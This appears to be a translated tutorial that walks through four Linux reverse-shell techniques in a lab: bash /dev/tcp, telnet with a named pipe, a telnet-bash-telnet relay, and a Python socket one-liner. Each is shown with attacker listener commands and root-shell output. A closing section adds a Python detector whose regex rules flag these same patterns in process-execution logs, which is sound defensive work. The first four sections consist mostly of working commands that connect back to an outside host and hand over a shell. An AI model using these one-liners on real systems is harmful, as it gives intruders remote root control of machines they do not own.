I. Reverse shell via bash
1. On the attacker machine, listen on port 2222 with nc
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 2222
listening on [any] 2222 ...
2. On the server, connect to port 2222, where the attacker machine (192.168.137.131) is listening
[root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&1
3. Connection established
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 2222
listening on [any] 2222 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 60192
[root@localhost netcat-0.7.1]# id
id
uid=0(root) gid=0(root) 组=0(root)
II. Reverse shell via telnet
1. On the attacker machine, listen on port 2222 with nc
┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 2222
listening on [any] 2222 ...
2. On the server, connect to port 2222, where the attacker machine (192.168.137.131) is listening (the named pipe `a` carries the shell's output back into telnet)
[root@localhost hids]# mknod a p; telnet 192.168.137.131 2222 0<a | /bin/bash 1>a
3. Connection established
┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 2222
listening on [any] 2222 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 50482
id;
uid=0(root) gid=0(root) 组=0(root)
III. Reverse shell via telnet (command output displayed on a second machine)
1. On the attacker machine (192.168.137.131), listen on port 2222 with nc
┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 2222
listening on [any] 2222 ...
2. On the output machine (192.168.137.134), listen on port 3333 with nc
┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 3333
listening on [any] 3333 ...
3. On the server, connect to port 2222 on the attacker machine (192.168.137.131) and, through a pipe, send the command output to port 3333 on the output machine (192.168.137.134), where it is displayed.
[root@localhost ~]# telnet 192.168.137.131 2222 | /bin/bash | telnet 192.168.137.134 3333
Trying 192.168.137.134...
Connected to 192.168.137.134.
Escape character is '^]'.
/bin/bash:行1: Trying: 未找到命令
/bin/bash:行2: Connected: 未找到命令
/bin/bash:行3: Escape: 未找到命令
The three "未找到命令" (command not found) lines are expected: the first telnet's own connection banner is piped into /bin/bash and interpreted as commands, while bash's stderr still goes to the server's terminal.
4. The attacker machine (192.168.137.131) receives the connection; type a command to test.
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 2222    130 ⨯
listening on [any] 2222 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 51208
id
5. Check whether the output machine (192.168.137.134) displays the result of the command.
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 3333
listening on [any] 3333 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.134] from (UNKNOWN) [192.168.137.130] 45286
uid=0(root) gid=0(root) 组=0(root)
IV. Reverse shell via python
1. On the attacker machine, listen on port 2222 with nc
┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 2222
listening on [any] 2222 ...
2. On the server, connect to port 2222, where the attacker machine (192.168.137.131) is listening
[root@localhost ~]# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.131",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
3. Connection established
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 2222    130 ⨯
listening on [any] 2222 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 51006
sh-4.2# id
id
uid=0(root) gid=0(root) 组=0(root)
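All four variants above leave a distinctive trace in process-execution telemetry: a shell command line naming /dev/tcp, a named pipe followed by a network client from the same parent, a network client piped through a shell into a second client, or an interpreter one-liner that connects a socket, dup2()s it onto fds 0-2 and spawns a shell. The detector below is an added example written for this page, not code from the original post; it runs the four corresponding rules over constructed sample exec events (pid, ppid, command line), and the event tuples, pids, rule names and the regexes are all my own assumptions, not output of any real agent.

```python
import re

# Constructed sample process-execution records (not taken from the page). Each tuple
# is (pid, ppid, command line), the shape a host agent or an auditd EXECVE collector
# delivers after normalisation. Redirections such as 0<a or >& are handled by the
# calling shell, so only the bash -i case carries them in its own command line.
SAMPLE_EVENTS = [
    ("4101", "3990", "bash -i >& /dev/tcp/192.168.137.131/2222 0>&1"),
    ("4102", "4000", "mknod a p"),
    ("4103", "4000", "telnet 192.168.137.131 2222"),
    ("4104", "4010", "telnet 192.168.137.131 2222 | /bin/bash | telnet 192.168.137.134 3333"),
    ("4105", "4020", "python -c 'import socket,subprocess,os;"
                     "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                     "s.connect((\"192.168.137.131\",2222));os.dup2(s.fileno(),0);"
                     "os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
                     "p=subprocess.call([\"/bin/sh\",\"-i\"]);'"),
    ("4106", "1",    "/usr/bin/python3 /opt/backup/run.py --verbose"),   # benign
    ("4107", "4000", "curl https://example.invalid/status"),              # benign
]

NET_CLIENT = r"\b(?:telnet|nc|ncat|netcat|socat)\b"
SHELL = r"(?:/bin/)?(?:ba|z|da)?sh\b"

# Stateless rules: each one inspects a single command line.
STATELESS_RULES = {
    # section I: bash's /dev/tcp pseudo-device used as a socket
    "bash_dev_tcp_redirect": re.compile(
        r"/dev/(?:tcp|udp)/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    # section III: network client piped into a shell whose output feeds a second client
    "shell_between_net_clients": re.compile(
        NET_CLIENT + r"[^|]*\|\s*" + SHELL + r"[^|]*\|\s*" + NET_CLIENT),
    # section IV: interpreter one-liner that connects a socket, dup2()s it onto
    # fds 0-2 and then spawns a shell
    "interpreter_socket_dup2": re.compile(
        r"\b(?:python\d?|perl|ruby|php)\b.*socket.*connect.*dup2.*" + SHELL, re.S),
}

# Stateful rule for section II: a named pipe created under some parent, followed by
# a network client started by the same parent. The fifo alone is benign; the pair
# is the signal, so correlation is keyed on ppid rather than on process name.
FIFO_CREATE = re.compile(r"\b(?:mkfifo\s+\S+|mknod\s+\S+\s+p)\b")
NET_CLIENT_AT_START = re.compile(r"^\s*" + NET_CLIENT)


def detect(events):
    """Return (pid, rule_name) findings, in event order, for a sequence of exec events."""
    findings = []
    fifo_parents = set()
    for pid, ppid, cmdline in events:
        for name, rx in STATELESS_RULES.items():
            if rx.search(cmdline):
                findings.append((pid, name))
        if FIFO_CREATE.search(cmdline):
            fifo_parents.add(ppid)
        elif ppid in fifo_parents and NET_CLIENT_AT_START.match(cmdline):
            findings.append((pid, "net_client_after_fifo"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Run stand-alone, the script flags events 4101, 4103, 4104 and 4105 and stays silent on the two benign lines, including the `curl` started by the same parent as the fifo (it is not a listed network client). In production the ppid correlation would need a time window and a reset when the parent exits, and the `interpreter_socket_dup2` rule is the noisiest of the four because legitimate `python -c` one-liners exist; pairing these exec rules with an outbound-connection event from the same pid is the usual way to cut that noise.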